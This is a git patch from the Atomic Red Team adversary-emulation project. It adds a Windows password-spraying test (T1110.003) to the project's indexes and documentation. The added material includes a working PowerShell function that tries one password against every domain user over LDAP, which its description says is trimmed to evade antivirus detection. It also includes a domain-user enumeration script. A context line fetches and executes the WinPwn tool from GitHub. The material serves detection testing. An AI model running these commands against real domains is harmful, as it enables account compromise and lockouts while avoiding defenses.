From 9e8bb918d5c048c8b33326fa2a196ef18a25a6e7 Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Thu, 19 May 2022 23:05:53 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 54 +++++++++++++
 atomics/T1110.003/T1110.003.md                | 77 +++++++++++++++++++
 6 files changed, 135 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 6514bf9a..36664a1c 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -115,6 +115,7 @@ credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSp
 credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
 credential-access,T1110.003,Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
+credential-access,T1110.003,Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
 credential-access,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 credential-access,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 41394156..5aded5c6 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -87,6 +87,7 @@ credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,
 credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
 credential-access,T1110.003,Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
+credential-access,T1110.003,Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
 credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 954c4224..d794df54 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -156,6 +156,7 @@
   - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
   - Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
   - Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
+  - Atomic Test #6: Password Spray Invoke-DomainPasswordSpray Light [windows]
 - [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
   - Atomic Test #1: Malicious PAM rule [linux]
   - Atomic Test #2: Malicious PAM module [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 4569f004..f651925e 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -122,6 +122,7 @@
   - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
   - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
   - Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
+  - Atomic Test #6: Password Spray Invoke-DomainPasswordSpray Light [windows]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
   - Atomic Test #1: Private Keys [windows]
   - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 43b39eef..850dc374 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -6160,6 +6160,60 @@ credential-access:
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           domainpassspray -consoleoutput -noninteractive -emptypasswords
         name: powershell
+    - name: Password Spray Invoke-DomainPasswordSpray Light
+      auto_generated_guid: b15bc9a5-a4f3-4879-9304-ea0011ace63a
+      description: "Perform a domain password spray using the same core method of
+        the [DomainPasswordSpray tool](https://github.com/dafthack/DomainPasswordSpray)
+        \nbut without all the extra code that makes the script get blocked by many
+        AVs. \nThis atomic test will attempt a single password against all users in
+        a password list at $env:Temp\\usersdpsLight.txt. You can create this file
+        manually\nor with the automated prereq_command. The prereq_command will limit
+        the user list to 200 users by default to help you avoid massive account lockout.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        user_limit:
+          description: The max number of users to put in the list when running the
+            prereq_command
+          type: Integer
+          default: 200
+        password:
+          description: The password to try for each user in users.txt
+          type: String
+          default: Spring2020
+      dependencies:
+      - description: 'Username file must exist at $env:Temp\usersdpsLight.txt
+
+          '
+        prereq_command: 'if (Test-Path  $env:Temp\usersdpsLight.txt) {exit 0} else
+          {exit 1}
+
+          '
+        get_prereq_command: "Write-Host -NoNewLine \"Reading Users.\" # this code
+          modifed from https://github.com/ZoomerHulkHogan/Powershell-Domain-User-Enumeration\n$netOutput
+          = net users /domain\n$netOutput = [System.Collections.ArrayList]($netOutput[6..($netOutput.length-3)])\n$userLimit
+          = #{user_limit}; $usercount = 0\nforeach ($line in $netOutput) {\n  if($usercount
+          -ge $userLimit){break}\n  $line = $line.trim()\n  $line = $line -split '\\s\\s+'\n
+          \ foreach ($user in $line){\n    if($usercount -ge $userLimit){break}\n
+          \   Add-Content $env:Temp\\usersdpsLight.txt $user\n    $usercount = $usercount
+          + 1\n    }  \n}\nWrite-Host \"Usernames saved to $env:Temp\\usersdpsLight.txt\"\n"
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          function Invoke-dpsLight ($Password, $userlist) {
+          $users = Get-Content $userlist
+          $Domain = "LDAP://" + ([ADSI]"").distinguishedName
+          foreach ($User in $users) {
+            $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)
+            if ($Domain_check.name -ne $null) {
+              Write-Host -ForegroundColor Green "Password found for User:$User Password:$Password"
+            }
+            else { Write-Host ". " -NoNewline}
+          }
+          Write-Host -ForegroundColor green "Finished"
+          }
+          Invoke-dpsLight "#{password}" $env:Temp\usersdpsLight.txt
   T1556.003:
     technique:
       object_marking_refs:
diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md
index 70b9dc0a..21a55d3c 100644
--- a/atomics/T1110.003/T1110.003.md
+++ b/atomics/T1110.003/T1110.003.md
@@ -33,6 +33,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
 
 - [Atomic Test #5 - WinPwn - DomainPasswordSpray Attacks](#atomic-test-5---winpwn---domainpasswordspray-attacks)
 
+- [Atomic Test #6 - Password Spray Invoke-DomainPasswordSpray Light](#atomic-test-6---password-spray-invoke-domainpasswordspray-light)
+
 
 <br/>
 
@@ -279,4 +281,79 @@ domainpassspray -consoleoutput -noninteractive -emptypasswords
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - Password Spray Invoke-DomainPasswordSpray Light
+Perform a domain password spray using the same core method of the [DomainPasswordSpray tool](https://github.com/dafthack/DomainPasswordSpray) 
+but without all the extra code that makes the script get blocked by many AVs. 
+This atomic test will attempt a single password against all users in a password list at $env:Temp\usersdpsLight.txt. You can create this file manually
+or with the automated prereq_command. The prereq_command will limit the user list to 200 users by default to help you avoid massive account lockout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b15bc9a5-a4f3-4879-9304-ea0011ace63a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| user_limit | The max number of users to put in the list when running the prereq_command | Integer | 200|
+| password | The password to try for each user in users.txt | String | Spring2020|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+function Invoke-dpsLight ($Password, $userlist) {
+$users = Get-Content $userlist
+$Domain = "LDAP://" + ([ADSI]"").distinguishedName
+foreach ($User in $users) {
+  $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)
+  if ($Domain_check.name -ne $null) {
+    Write-Host -ForegroundColor Green "Password found for User:$User Password:$Password"
+  }
+  else { Write-Host ". " -NoNewline}
+}
+Write-Host -ForegroundColor green "Finished"
+}
+Invoke-dpsLight "#{password}" $env:Temp\usersdpsLight.txt
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Username file must exist at $env:Temp\usersdpsLight.txt
+##### Check Prereq Commands:
+```powershell
+if (Test-Path  $env:Temp\usersdpsLight.txt) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host -NoNewLine "Reading Users." # this code modifed from https://github.com/ZoomerHulkHogan/Powershell-Domain-User-Enumeration
+$netOutput = net users /domain
+$netOutput = [System.Collections.ArrayList]($netOutput[6..($netOutput.length-3)])
+$userLimit = #{user_limit}; $usercount = 0
+foreach ($line in $netOutput) {
+  if($usercount -ge $userLimit){break}
+  $line = $line.trim()
+  $line = $line -split '\s\s+'
+  foreach ($user in $line){
+    if($usercount -ge $userLimit){break}
+    Add-Content $env:Temp\usersdpsLight.txt $user
+    $usercount = $usercount + 1
+    }  
+}
+Write-Host "Usernames saved to $env:Temp\usersdpsLight.txt"
+```
+
+
+
+
 <br/>